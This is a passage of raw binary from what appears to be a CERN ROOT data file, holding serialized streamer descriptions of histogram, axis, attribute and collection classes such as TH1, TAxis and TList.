weights\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fTsumwx\x15Total Sum of weight*X\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fTsumwx2\x17Total Sum of weight*X*X\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum\x1aMaximum value for plotting\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum\x1aMinimum value for plotting\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfNormFactor\x14Normalization factor\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00u\x80\x00\x08\xbf@\x00\x00m\x00\x02@\x00\x00g\x00\x04@\x00\x005\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fContour\x1fArray to display contour levels\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00v\x80\x00\x08\xbf@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x006\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fSumw2"Array of sum of squares of weights\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00f\x80\x00\x01?@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fOption\x11histogram options\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00\x9c\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00}\x00\x02@\x00\x00w\x00\x04@\x00\x00F\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFunctions.->Pointer to list of functions (fits and user)\x00\x00\x00?\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00a\x80\x00\x02\x08@\x00\x00Y\x00\x02@\x00\x00S\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfBufferSize\x0cfBuffer size\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x99\xff\xff\xff\xffTStreamerBasicPointer\x00@\x00\x00{\x00\x02@\x00\x00a\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fBuffer\x1a[fBufferSize] entry buffer\x00\x00\x000\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07double*\x00\x00\x00\x08\x0bfBufferSize\x03TH1@\x00\x00\x87\x80\x00\x02\x08@\x00\x00\x7f\x00\x02@\x00\x00y\x00\x04@\x00\x00=\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efBinStatErrOpt!option for bin statistical errors\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11TH1::EBinErrorOpt@\x00\x00\x9c\x80\x00\x02\x08@\x00\x00\x94\x00\x02@\x00\x00\x8e\x00\x04@\x00\x00P\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efStatOverflows4per object flag to use under/overflows in statistics\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13TH1::EStatOverflows\x00@\x00\x01\x82\x80\x00\x00[@\x00\x01z\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TNamed\x00\xdf\xb7J<\x00\x00\x00\x01@\x00\x01T\x80\x00\x00\x9b@\x00\x01L\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00d\x80\x00\x01?@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fName\x11object identifier\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00`\x80\x00\x01?@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00 \x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fTitle\x0cobject title\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString\x00@\x00\x01y\x80\x00\x00[@\x00\x01q\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TAttLine\x00\x94\x07EI\x00\x00\x00\x02@\x00\x01I\x80\x00\x00\x9b@\x00\x01A\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00`\x80\x00\x02\x08@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLineColor\nLine color\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00`\x80\x00\x02\x08@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLineStyle\nLine style\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00`\x80\x00\x02\x08@\x00\x00X\x00\x02@\x00\x00R\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLineWidth\nLine width\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x01\x1f\x80\x00\x00[@\x00\x01\x17\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TAttFill\x00\xff\xd9*\x92\x00\x00\x00\x02@\x00\x00\xef\x80\x00\x00\x9b@\x00\x00\xe7\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFillColor\x0fFill area color\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFillStyle\x0fFill area style\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x01\x85\x80\x00\x00[@\x00\x01}\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTAttMarker\x00)\x1d\x8b\xec\x00\x00\x00\x02@\x00\x01S\x80\x00\x00\x9b@\x00\x01K\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfMarkerColor\x0cMarker color\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfMarkerStyle\x0cMarker style\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00b\x80\x00\x02\x08@\x00\x00Z\x00\x02@\x00\x00T\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfMarkerSize\x0bMarker size\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float\x00@\x00\x00\xb3\x80\x00\x00[@\x00\x00\xab\x00\t@\x00\x00\x14\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x06TArray\x00\x00p!\xb2\x00\x00\x00\x01@\x00\x00\x85\x80\x00\x00\x9b@\x00\x00}\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fN\x18Number of array elements\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int\x00@\x00\x06\t\x80\x00\x00[@\x00\x06\x01\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TAxis\x00ZInp\x00\x00\x00\n@\x00\x05\xdc\x80\x00\x00\x9b@\x00\x05\xd4\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\r\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttAxis\x0fAxis attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\o\xff>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00^\x80\x00\x02\x08@\x00\x00V\x00\x02@\x00\x00P\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fNbins\x0eNumber of bins\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00g\x80\x00\x02\x08@\x00\x00_\x00\x02@\x00\x00Y\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fXmin\x15low edge of first bin\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fXmax\x16upper edge of last bin\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00h\x80\x00\x08\xbf@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fXbins\x14Bin edges array in X\x00\x00\x00>\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TArrayD@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fFirst\x14first bin to display\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00b\x80\x00\x02\x08@\x00\x00Z\x00\x02@\x00\x00T\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fLast\x13last bin to display\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00q\x80\x00\x02\x08@\x00\x00i\x00\x02@\x00\x00c\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fBits2\x16second bit status word\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0eunsigned short@\x00\x00\x88\x80\x00\x02\x08@\x00\x00\x80\x00\x02@\x00\x00z\x00\x04@\x00\x00K\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfTimeDisplay1on/off displaying time values instead of numerics\x00\x00\x00\x12\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04bool@\x00\x00\x80\x80\x00\x01?@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00@\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfTimeFormat\'Date&time format, ex: 09/12/99 12:34:00\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00f\x80\x00\x16\xcb@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00#\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fLabels\x0eList of labels\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTHashList*@\x00\x00l\x80\x00\x16\xcb@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fModLabs\x17List of modified labels\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*\x00@\x00\x05\x0e\x80\x00\x00[@\x00\x05\x06\x00\t@\x00\x00\x16\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x08TAttAxis\x00\\o\xff>\x00\x00\x00\x04@\x00\x04\xde\x80\x00\x00\x9b@\x00\x04\xd6\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00@\x00\x00\x80\x80\x00\x02\x08@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00D\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfNdivisions+Number of divisions(10000*n3 + 100*n2 + n1)\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00.\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfAxisColor\x16Color of the line axis\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00f\x80\x00\x02\x08@\x00\x00^\x00\x02@\x00\x00X\x00\x04@\x00\x00(\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfLabelColor\x0fColor of labels\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00e\x80\x00\x02\x08@\x00\x00]\x00\x02@\x00\x00W\x00\x04@\x00\x00\'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLabelFont\x0fFont for labels\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfLabelOffset\x10Offset of labels\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00d\x80\x00\x02\x08@\x00\x00\\\x00\x02@\x00\x00V\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfLabelSize\x0eSize of labels\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00k\x80\x00\x02\x08@\x00\x00c\x00\x02@\x00\x00]\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfTickLength\x14Length of tick marks\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00l\x80\x00\x02\x08@\x00\x00d\x00\x02@\x00\x00^\x00\x04@\x00\x00.\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfTitleOffset\x14Offset of axis title\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00h\x80\x00\x02\x08@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTitleSize\x12Size of axis title\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05float@\x00\x00j\x80\x00\x02\x08@\x00\x00b\x00\x02@\x00\x00\\\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfTitleColor\x13Color of axis title\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short@\x00\x00i\x80\x00\x02\x08@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfTitleFont\x13Font for axis title\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05short\x00@\x00\x00\xb8\x80\x00\x00[@\x00\x00\xb0\x00\t@\x00\x00\x17\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\tTHashList\x00\xcc~I\xc1\x00\x00\x00\x00@\x00\x00\x87\x80\x00\x00\x9b@\x00\x00\x7f\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00f\x80\x00\x00\xc6@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05TList\x12Doubly linked list\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\xc5\xc3\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05\x00@\x00\x00\xc6\x80\x00\x00[@\x00\x00\xbe\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TList\x00i\xc5\xc3\xbb\x00\x00\x00\x05@\x00\x00\x99\x80\x00\x00\x9b@\x00\x00\x91\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00x\x80\x00\x00\xc6@\x00\x00p\x00\x03@\x00\x00f\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0eTSeqCollection\x1bSequenceable collection ABC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfcl;\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x00\x00@\x00\x00\xcf\x80\x00\x00[@\x00\x00\xc7\x00\t@\x00\x00\x1c\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0eTSeqCollection\x00\xfcl;\xc6\x00\x00\x00\x00@\x00\x00\x99\x80\x00\x00\x9b@\x00\x00\x91\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00@\x00\x00x\x80\x00\x00\xc6@\x00\x00p\x00\x03@\x00\x00f\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bTCollection\x1eCollection abstract base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\xe3\xcb\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x03\x00@\x00\x01\x9b\x80\x00\x00[@\x00\x01\x93\x00\t@\x00\x00\x19\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0bTCollection\x00W\xe3\xcb\x9c\x00\x00\x00\x03@\x00\x01h\x80\x00\x00\x9b@\x00\x01`\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00@\x00\x00g\x80\x00\x00\xc6@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00i\x80\x00\x01?@\x00\x00a\x00\x02@\x00\x00[\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fName\x16name of the collection\x00\x00\x00A\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07TString@\x00\x00o\x80\x00\x02\x08@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fSize number of elements in 